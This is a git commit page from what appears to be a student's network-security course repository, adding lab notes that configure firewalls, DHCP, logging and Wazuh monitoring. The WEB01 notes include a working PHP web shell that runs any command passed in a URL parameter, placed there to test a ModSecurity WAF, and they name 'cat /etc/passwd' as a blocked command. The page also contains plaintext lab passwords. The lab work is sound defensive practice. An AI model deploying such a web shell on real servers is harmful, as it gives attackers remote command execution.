lotte/ChamplainTechJournals
1
Code Activity

migrate to git.charlotte.sh

Browse source
This commit is contained in:
Charlotte Croce 2025-04-19 23:42:08 -04:00
commit fbd588721e
412 changed files with 13750 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

57
net-sec-controls-sec350/machines/DHCP01.md Normal file
View file

@ -0,0 +1,57 @@
# DHCP01 Configuration
## Basic Setup
- Set hostname to `dhcp01-charlotte`
- Add sudo user `charlotte`
Set network via netplan:
- IP Address: `172.16.150.151/24`
- Gateway & DNS: `172.16.150.2`
- Network adapter: LAN
## Install and Configure DHCP Server
Install DHCP server
```bash
sudo apt update
sudo apt install isc-dhcp-server -y
```
Configure DHCP server
```bash
> sudo nano /etc/dhcp/dhcpd.conf
default-lease-time 600;
max-lease-time 7200;
option subnet-mask 255.255.255.0;
option broadcast-address 172.16.150.255;
option routers 172.16.150.2;
option domain-name-servers 172.16.150.2;
subnet 172.16.150.0 netmask 255.255.255.0 {
range 172.16.150.100 172.16.150.150;
}
```
Configure the interface for DHCP server:
```bash
> sudo nano /etc/default/isc-dhcp-server
...
INTERFACESv4="ens160"
INTERFACESv6=""
...
```
Start and enable DHCP server
```bash
sudo systemctl enable isc-dhcp-server
sudo systemctl restart isc-dhcp-server
```
## Install Wazuh Agent
```bash
# Download and install Wazuh agent
curl -o wazuh-agent-4.7.5-1.amd64.deb https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent-4.7.5-1.amd64.deb && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='dhcp01-charlotte' dpkg -i wazuh-agent-4.7.5-1.amd64.deb
# Start the agent
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```

197
net-sec-controls-sec350/machines/EDGE01.md Normal file
View file

@ -0,0 +1,197 @@
# EDGE01 Configuration
## Initial Setup
- Change password:
```
configure
set system login user vyos authentication plaintext-password password123!
commit
save
```
- Change hostname:
```
configure
set system host-name edge01-charlotte
commit
save
```
## Interface Configuration
```
configure
set interfaces ethernet eth0 description SEC350-WAN
set interfaces ethernet eth1 description CHARLOTTE-DMZ
set interfaces ethernet eth2 description CHARLOTTE-LAN
set interfaces ethernet eth0 address 10.0.17.151/24
set interfaces ethernet eth1 address 172.16.50.2/29
set interfaces ethernet eth2 address 172.16.150.2/24
commit
save
```
## Gateway and DNS Configuration
```
configure
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set system name-server 10.0.17.2
commit
save
```
## NAT Configuration
```
configure
# DMZ to WAN NAT
set nat source rule 10 description "NAT FROM DMZ to WAN"
set nat source rule 10 outbound-interface eth0
set nat source rule 10 source address 172.16.50.0/29
set nat source rule 10 translation address masquerade
# LAN to WAN NAT
set nat source rule 20 description "NAT FROM LAN to WAN"
set nat source rule 20 outbound-interface eth0
set nat source rule 20 source address 172.16.150.0/24
set nat source rule 20 translation address masquerade
# MGMT to WAN NAT
set nat source rule 30 description "NAT FROM MGMT to WAN"
set nat source rule 30 outbound-interface eth0
set nat source rule 30 source address 172.16.200.0/28
set nat source rule 30 translation address masquerade
# Port Forwarding for HTTP
set nat destination rule 10 description "HTTP->NGINX01"
set nat destination rule 10 inbound-interface eth0
set nat destination rule 10 destination port 80
set nat destination rule 10 protocol tcp
set nat destination rule 10 translation address 172.16.50.3
# Port Forwarding for SSH
set nat destination rule 20 description "SSH->JUMP"
set nat destination rule 20 inbound-interface eth0
set nat destination rule 20 destination port 22
set nat destination rule 20 protocol tcp
set nat destination rule 20 translation address 172.16.50.4
commit
save
```
## DNS Forwarding Configuration
```
configure
# DMZ DNS Forwarding
set service dns forwarding listen-address 172.16.50.2
set service dns forwarding allow-from 172.16.50.0/29
# LAN DNS Forwarding
set service dns forwarding listen-address 172.16.150.2
set service dns forwarding allow-from 172.16.150.0/24
set service dns forwarding system
commit
save
```
## Zone Configuration
```
configure
set zone-policy zone WAN interface eth0
set zone-policy zone DMZ interface eth1
set zone-policy zone LAN interface eth2
commit
save
```
## Firewall Configuration
```
configure
# Create Zone-Based Firewalls
# WAN-to-DMZ
set firewall name WAN-to-DMZ default-action drop
set firewall name WAN-to-DMZ enable-default-log
set firewall name WAN-to-DMZ rule 1 action accept
set firewall name WAN-to-DMZ rule 1 state established enable
set firewall name WAN-to-DMZ rule 10 description "allow HTTP from WAN to DMZ"
set firewall name WAN-to-DMZ rule 10 action accept
set firewall name WAN-to-DMZ rule 10 destination address 172.16.50.3
set firewall name WAN-to-DMZ rule 10 destination port 80
set firewall name WAN-to-DMZ rule 10 protocol tcp
set firewall name WAN-to-DMZ rule 20 action accept
set firewall name WAN-to-DMZ rule 20 description "SSH to JUMP"
set firewall name WAN-to-DMZ rule 20 destination address 172.16.50.4
set firewall name WAN-to-DMZ rule 20 destination port 22
set firewall name WAN-to-DMZ rule 20 protocol tcp
# DMZ-to-WAN
set firewall name DMZ-to-WAN default-action drop
set firewall name DMZ-to-WAN enable-default-log
set firewall name DMZ-to-WAN rule 1 action accept
set firewall name DMZ-to-WAN rule 1 state established enable
# LAN-to-DMZ
set firewall name LAN-to-DMZ default-action drop
set firewall name LAN-to-DMZ enable-default-log
set firewall name LAN-to-DMZ rule 1 action accept
set firewall name LAN-to-DMZ rule 1 state established enable
set firewall name LAN-to-DMZ rule 10 description "Allow HTTP from LAN to DMZ"
set firewall name LAN-to-DMZ rule 10 action accept
set firewall name LAN-to-DMZ rule 10 destination address 172.16.50.3
set firewall name LAN-to-DMZ rule 10 destination port 80
set firewall name LAN-to-DMZ rule 10 protocol tcp
set firewall name LAN-to-DMZ rule 20 description "Allow SSH from MGMT-01 to DMZ"
set firewall name LAN-to-DMZ rule 20 action accept
set firewall name LAN-to-DMZ rule 20 destination port 22
set firewall name LAN-to-DMZ rule 20 protocol tcp
set firewall name LAN-to-DMZ rule 20 source address 172.16.150.10
# DMZ-to-LAN
set firewall name DMZ-to-LAN default-action drop
set firewall name DMZ-to-LAN enable-default-log
set firewall name DMZ-to-LAN rule 1 action accept
set firewall name DMZ-to-LAN rule 1 state established enable
set firewall name DMZ-to-LAN rule 10 description "wazuh agent communication with server"
set firewall name DMZ-to-LAN rule 10 action accept
set firewall name DMZ-to-LAN rule 10 destination address 172.16.200.10
set firewall name DMZ-to-LAN rule 10 destination port 1514,1515
set firewall name DMZ-to-LAN rule 10 protocol tcp
# LAN-to-WAN
set firewall name LAN-to-WAN default-action drop
set firewall name LAN-to-WAN enable-default-log
set firewall name LAN-to-WAN rule 1 action accept
# WAN-to-LAN
set firewall name WAN-to-LAN default-action drop
set firewall name WAN-to-LAN enable-default-log
set firewall name WAN-to-LAN rule 1 action accept
set firewall name WAN-to-LAN rule 1 state established enable
# Apply Zone Policies
set zone-policy zone DMZ from LAN firewall name LAN-to-DMZ
set zone-policy zone DMZ from WAN firewall name WAN-to-DMZ
set zone-policy zone LAN from DMZ firewall name DMZ-to-LAN
set zone-policy zone LAN from WAN firewall name WAN-to-LAN
set zone-policy zone WAN from DMZ firewall name DMZ-to-WAN
set zone-policy zone WAN from LAN firewall name LAN-to-WAN
commit
save
```
## Rip Configuration
```
configure
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
commit
save
```
## SSH Configuration
```
# Restrict SSH access to LAN interface only
configure
set service ssh listen-address 172.16.150.2
commit
save
```

52
net-sec-controls-sec350/machines/FW-MGMT.md Normal file
View file

@ -0,0 +1,52 @@
# FW-MGMT Configuration
## Interface Configuration
```
configure
set interfaces ethernet eth0 description LAN
set interfaces ethernet eth1 description MGMT
set interfaces ethernet eth0 address 172.16.150.3/24
set interfaces ethernet eth1 address 172.16.200.2/28
commit
save
```
## Gateway & DNS Configuration
```
configure
set protocols static route 0.0.0.0/0 next-hop 172.16.150.2
set system name-server 172.16.150.2
commit
save
```
## DNS Forwarding
```
configure
set service dns forwarding listen-address 172.16.200.2
set service dns forwarding allow-from 172.16.200.0/28
set service dns forwarding system
commit
save
```
## Zone Configuration
```
configure
set zone-policy zone LAN interface eth0
set zone-policy zone MGMT interface eth1
commit
save
```
## Firewall Configuration
copy current configuration form `configs` directory
## RIP Configuration
```
configure
set protocols rip interface eth0
set protocols rip network '172.16.200.0/28'
commit
save
```

109
net-sec-controls-sec350/machines/FW01.md Normal file
View file

@ -0,0 +1,109 @@
# FW01 Configuration
## Initial Setup
- Change password:
```
set system login user vyos authentication plaintext-password password
```
## Hostname Configuration
```
configure
set system host-name fw01-charlotte
commit
save
```
## Interface Configuration
```
configure
set interfaces ethernet eth0 description SEC350-WAN
set interfaces ethernet eth1 description CHARLOTTE-DMZ
set interfaces ethernet eth2 description CHARLOTTE-LAN
set interfaces ethernet eth0 address 10.0.17.151/24
set interfaces ethernet eth1 address 172.16.50.2/29
set interfaces ethernet eth2 address 172.16.150.2/24
commit
save
```
## Gateway & DNS Configuration
```
configure
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set system name-server 10.0.17.2
commit
save
```
## NAT Configuration
```
configure
# DMZ to WAN NAT
set nat source rule 10 description "NAT FROM DMZ to WAN"
set nat source rule 10 outbound-interface eth0
set nat source rule 10 source address 172.16.50.0/29
set nat source rule 10 translation address masquerade
# LAN to WAN NAT
set nat source rule 20 description "NAT FROM LAN to WAN"
set nat source rule 20 outbound-interface eth0
set nat source rule 20 source address 172.16.150.0/24
set nat source rule 20 translation address masquerade
# MGMT to WAN NAT
set nat source rule 30 description "NAT FROM MGMT to WAN"
set nat source rule 30 outbound-interface eth0
set nat source rule 30 source address 172.16.200.0/28
set nat source rule 30 translation address masquerade
commit
save
```
## DNS Forwarding Configuration
```
configure
# DMZ DNS Forwarding
set service dns forwarding listen-address 172.16.50.2
set service dns forwarding allow-from 172.16.50.0/29
# LAN DNS Forwarding
set service dns forwarding listen-address 172.16.150.2
set service dns forwarding allow-from 172.16.150.0/24
set service dns forwarding system
commit
save
```
## Zone Configuration
```
configure
set zone-policy zone WAN interface eth0
set zone-policy zone DMZ interface eth1
set zone-policy zone LAN interface eth2
commit
save
```
## Firewall Configuration
copy current configuration from `configs` directory
## RIP Configuration
```
configure
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
commit
save
```
## Syslog Configuration (remove when appropriate)
```
# When log01 is active
set system syslog host 172.16.50.5 facility authpriv level info
# When log01 is retired
delete system syslog host 172.16.50.5
```

123
net-sec-controls-sec350/machines/LOG01.md Normal file
View file

@ -0,0 +1,123 @@
# LOG01 Configuration
> **Note**: This is the original log01 server that will eventually be retired, then brought back as a jump server.
## Basic Setup
- Set hostname to `log01-charlotte`
- Add sudo user `charlotte:password`
- Set network adapter to DMZ
- Configure static IP via nmtui:
- IP Address: `172.16.50.5/29`
- Gateway & DNS: `172.16.50.2`
## Configure Firewall for Syslog
```
sudo firewall-cmd --add-port=514/tcp --permanent
sudo firewall-cmd --add-port=514/udp --permanent
sudo firewall-cmd --reload
```
## Configure Rsyslog
### Enable Syslog Input Modules
Edit `/etc/rsyslog.conf` and uncomment these lines:
```
# Provides UDP syslog reception
module(load="imudp")
input(type="imudp" port="514")
# Provides TCP syslog reception
module(load="imtcp")
input(type="imtcp" port="514")
```
### Configure High Precision Timestamps
Add to `/etc/rsyslog.conf`:
```
$ActionFileDefaultTemplate RSYSLOG_SyslogProtocol23Format
template(name="BetterTiming" type="string" string="%timestamp:::date-rfc3339% %HOSTNAME% %syslogtag%%msg%\n")
```
Apply the template to the desired log file:
```
# Example: Add ;BetterTiming suffix to a log destination
*.info;mail.none;authpriv.none;cron.none /var/log/messages;BetterTiming
```
### Configure Log Organization
Create a file named `/etc/rsyslog.d/sec350.conf` with these contents:
```
# Input modules
module(load="imudp")
input(type="imudp" port="514")
module(load="imtcp")
input(type="imtcp" port="514")
# Creating templates for storing logs dynamically
$template DynFile,"/var/log/%HOSTNAME%/%$YEAR%/%$MONTH%/%$DAY%/%programname%.log"
$template RemoteLogs,"/var/log/remote/%HOSTNAME%/%$YEAR%/%$MONTH%/%$DAY%/%programname%.log"
# Create a ruleset for remote devices
ruleset(name="RemoteDevice"){
action(type="omfile" dynaFile="RemoteLogs")
}
# Direct local logs to files
:programname, !startswith, "rsyslog" ?DynFile
# Direct messages from remote hosts to the ruleset
:inputname, isequal, "imudp" call RemoteDevice
:inputname, isequal, "imtcp" call RemoteDevice
```
### Restart Rsyslog
```
sudo systemctl restart rsyslog
```
## Monitor Incoming Logs
```
tail -f /var/log/messages
```
Or check specific remote log files:
```
tail -f /var/log/remote/*/*/*/*/sshd.log
```
## Recommissioned as Jump Server
When log01 is repurposed as a jump server:
1. Change IP address to: `172.16.50.4/29`
2. Change hostname: `sudo hostnamectl set-hostname jump-charlotte`
### SSH Configuration for Passwordless Access
```bash
# Create dedicated user for jump access
useradd -m -d /home/charlotte-jump -s /bin/bash charlotte-jump
# Disable password authentication
sudo sed -i 's/PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
# Create SSH directory structure with proper permissions
mkdir -p /home/charlotte-jump/.ssh
chmod 700 /home/charlotte-jump/.ssh
# Add the public key to authorized_keys
echo "ssh-rsa AAAAB3N...your-public-key..." >> /home/charlotte-jump/.ssh/authorized_keys
# Set proper permissions and ownership
chmod 600 /home/charlotte-jump/.ssh/authorized_keys
chown -R charlotte-jump:charlotte-jump /home/charlotte-jump/.ssh
# Restart SSH service
systemctl restart sshd
```
### Wazuh Agent Installation
```bash
sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='jump-charlotte' rpm -ihv wazuh-agent-4.7.3-1.x86_64.rpm
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```

27
net-sec-controls-sec350/machines/MGMT01.md Normal file
View file

@ -0,0 +1,27 @@
# MGMT01 Configuration
## Network Configuration
- Configure static IP via network manager:
- IP Address: `172.16.150.10/24`
- Gateway & DNS: `172.16.150.2`
- Network: LAN
## Chrome Remote Desktop Setup
1. Open Chrome and sign in with charlotte.croce@mymail.champlain.edu
2. Enable sync if prompted
3. Go to remotedesktop.google.com and install the app
4. On your main host (laptop):
- Go to https://g.co/crd/headless
- Download and install the Chrome Remote Desktop package
- For dependency issues:
```
sudo apt install libutempter0 xbase-clients xserver-xorg-video-dummy xvfb
sudo dpkg -i google-chrome-stable_current_amd64
```
5. Follow the setup prompts and create a PIN
6. Log out of the remote computer before attempting to connect
## Notes
- With current firewall configs, this machine should be able to access:
- SSH to systems in the DMZ (port 22)
- HTTPS access to wazuh server (port 443)

7
net-sec-controls-sec350/machines/MGMT02.md Normal file
View file

@ -0,0 +1,7 @@
# MGMT02 Configuration
## Network Configuration
- Configure static IP:
- IP Address: `172.16.200.11/28`
- Gateway & DNS: `172.16.200.2`
- Network: MGMT

35
net-sec-controls-sec350/machines/NGINX01.md Normal file
View file

@ -0,0 +1,35 @@
# NGINX01 Configuration
## Basic Setup
- Set hostname to `nginx01-charlotte`
- Add sudo user `charlotte`
- Set network via nmtui:
- IP Address: `172.16.50.3/29`
- Gateway & DNS: `172.16.50.2`
- Network adapter: DMZ
## Install and Configure NGINX
```bash
# Install NGINX
sudo apt update
sudo apt install nginx -y
sudo systemctl enable nginx
sudo systemctl start nginx
# Create custom index page
echo "<h1>NGINX01 - Charlotte Croce</h1>" | sudo tee /var/www/html/index.html
```
* Remember to add firewall and port forwarding rule for this new IP!
* Also, add firewall-cmd rules if applicable
## Install Wazuh Agent
```bash
# Download and install Wazuh agent
curl -o wazuh-agent-4.7.5-1.amd64.deb https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent-4.7.5-1.amd64.deb && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='nginx01-charlotte' dpkg -i wazuh-agent-4.7.5-1.amd64.deb
# Start the agent
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```

37
net-sec-controls-sec350/machines/RW01.md Normal file
View file

@ -0,0 +1,37 @@
# RW01 Configuration
## Basic Setup
- Set hostname to `rw01-charlotte`
- Add sudo user `charlotte:password`
- IP Address: `10.0.17.51/24`
- Gateway & DNS: `10.0.17.2`
## Static Route for DMZ Access
```bash
sudo ip route add 172.16.50.0/29 via 10.0.17.151
sudo systemctl restart NetworkManager
traceroute 172.16.50.3
```
## Rsyslog Configuration for High Precision Timestamps
1. Edit `/etc/rsyslog.conf`
2. Comment out this line to enable high precision timestamps:
```
# $ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat
```
3. Restart rsyslog:
```bash
sudo systemctl restart rsyslog
```
## SSH Key Creation for Jump Server Access
Generate a dedicated SSH key for jump server access:
```bash
ssh-keygen -t rsa -b 4096 -C "ssh to jump"
# Use filename: jump-charlotte
# Add a passphrase
```
To connect to the jump server using this key:
```bash
ssh -i ~/.ssh/jump-charlotte charlotte-jump@172.16.50.4
```

24
net-sec-controls-sec350/machines/TRAVELER.md Normal file
View file

@ -0,0 +1,24 @@
# TRAVELER Configuration
Windows machine to replace RW01
## Network Configuration
- System is on WAN network
- IP address: `10.0.17.51/24`
- Default gateway: `10.0.17.2`
- DNS server: `10.0.17.2`
## SSH Key Creation for Jump Server Access
Generate SSH keys using PowerShell:
```bash
# Generate new SSH key
ssh-keygen -t rsa -b 4096 -C "traveler to jump"
# Use filename: jump-charlotte
# Add a passphrase
```
To connect to the jump server:
```powershell
ssh -i C:\Users\username\.ssh\jump-charlotte charlotte-jump@10.0.17.151
```
Web Access
Can access nginx01 via `http://10.0.17.151:80` (port forwarded through edge-01)

69
net-sec-controls-sec350/machines/WAZUH.md Normal file
View file

@ -0,0 +1,69 @@
# Wazuh Server Configuration
## Network Configuration
- Set hostname: `sudo hostnamectl hostname wazuh-charlotte`
- Configure static IP with netplan by editing `/etc/netplan/00-installer-config.yaml`:
```yaml
network:
ethernets:
ens160:
addresses:
- 172.16.200.10/28
nameservers:
addresses: [172.16.200.2]
routes:
- to: default
via: 172.16.200.2
version: 2
```
- Apply netplan configuration:
```
sudo netplan apply
```
## Wazuh Installation
> **IMPORTANT**: Take a snapshot before installation
Run the single-node installation command:
```
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh && sudo bash ./wazuh-install.sh -a -i
```
> Note: The `-i` flag ignores minimum requirements of 2 CPU and 4 GB RAM
**IMPORTANT**: Save the auto-generated password shown after installation, you will need it later.
## Accessing the Wazuh Dashboard
- Try accessing the dashboard at: http://172.16.200.10/app/login
- Login with the auto-generated credentials
## Wazuh Agent Management
1. Create a new agent group:
- Wazuh dropdown > Management > Groups > Create a new group called "linux"
2. Deploy a new agent:
- Wazuh dropdown > Agents > Deploy a new agent
- Configuration options:
- OS: Redhat/CentOS
- Version: CentOS 6 or higher (works on Rocky 8)
- Architecture: x86_64
- Server IP: 172.16.200.10
- Agent Group: Linux
3. The web interface will generate an installation command for your agents
## Firewall Requirements
Ensure these ports are open:
- **1514/TCP** for agent communication
- **1515/TCP** for enrollment via automatic agent request
- **55000/TCP** for enrollment via Wazuh server API
## Agent Directory Structure
Wazuh agent files are stored in `/var/ossec/`. Key directories include:
- `/var/ossec/etc/` - Configuration files
- `/var/ossec/etc/ossec.conf` - agent IP settings
- `/var/ossec/logs/` - Log files
- `/var/ossec/queue/` - Communication queue
- `/var/ossec/agentless/` - Agentless monitoring
## Viewing Security Events
Dropdown > Modules > Security Events

104
net-sec-controls-sec350/machines/WEB01.md Normal file
View file

@ -0,0 +1,104 @@
# WEB01 Configuration
## Basic Setup
- Set hostname to `web01-charlotte`
- Add sudo user `charlotte:password`
- Set network via nmtui:
- IP Address: `172.16.50.3/29`
- Gateway & DNS: `172.16.50.2`
- Network adapter: DMZ
## Install and Configure HTTPD
```
# Install apache web server
sudo yum install httpd
sudo systemctl enable httpd
sudo systemctl start httpd
# If you need to edit the main config file:
sudo vi /etc/httpd/conf/httpd.conf
```
## Rsyslog Configuration
### Install rsyslog (if not installed)
```
sudo yum install rsyslog
```
### Configure Rsyslog for High Precision Timestamps
Edit `/etc/rsyslog.conf` and add these lines:
```
$ActionFileDefaultTemplate RSYSLOG_SyslogProtocol23Format
template(name="BetterTiming" type="string" string="%timestamp:::date-rfc3339% %HOSTNAME% %syslogtag%%msg%\n")
```
Note: ModSecurity will prevent dangerous commands like cat /etc/passwd while allowing safe commands like whoami and /sbin/ifconfig.
Apply the template to the desired log file:
```
# Example: Add ;BetterTiming suffix to a log destination
*.info;mail.none;authpriv.none;cron.none /var/log/messages;BetterTiming
```
### Configure Log Forwarding (when log01 is active)
Create a file at `/etc/rsyslog.d/sec350.conf` with these contents:
```
# For general logging
user.notice @172.16.50.5
# For authentication logging
authpriv.* @172.16.50.5
```
Restart rsyslog:
```
sudo systemctl restart rsyslog
```
## Install Wazuh Agent
```
# Download and install Wazuh agent
curl -o wazuh-agent-4.7.5-1.x86_64.rpm https://packages.wazuh.com/4.x/yum/wazuh-agent-4.7.5-1.x86_64.rpm && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='web01-charlotte' rpm -ihv wazuh-agent-4.7.5-1.x86_64.rpm
# Start the agent
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
## CentOS Repo Fix (if needed)
```
sudo sed -i s/mirror.centos.org/vault.centos.org/g /etc/yum.repos.d/CentOS-*.repo
sudo sed -i s/^#.*baseurl=http/baseurl=http/g /etc/yum.repos.d/CentOS-*.repo
sudo sed -i s/^mirrorlist=http/#mirrorlist=http/g /etc/yum.repos.d/CentOS-*.repo
```
## Web Application Firewall (ModSecurity)
Install ModSecurity and PHP:
```bash
sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y
```
## Create Test PHP Webshell
Create `/var/www/html/shell.php` with the following content:
```
<!-- source: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985 -->
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
```
> [!Note]
> ModSecurity will prevent dangerous commands like `cat /etc/passwd` while allowing safe commands like `whoami` and `/sbin/ifconfig`.

10
net-sec-controls-sec350/machines/WKS01.md Normal file
View file

@ -0,0 +1,10 @@
# WKS01 Configuration
## Network Configuration
- Configure static IP via network manager:
- IP Address: `172.16.150.50/24`
- Gateway & DNS: `172.16.150.2`
- Network: LAN
## Notes
- This workstation has HTTP access to web01 in the DMZ through firewall rules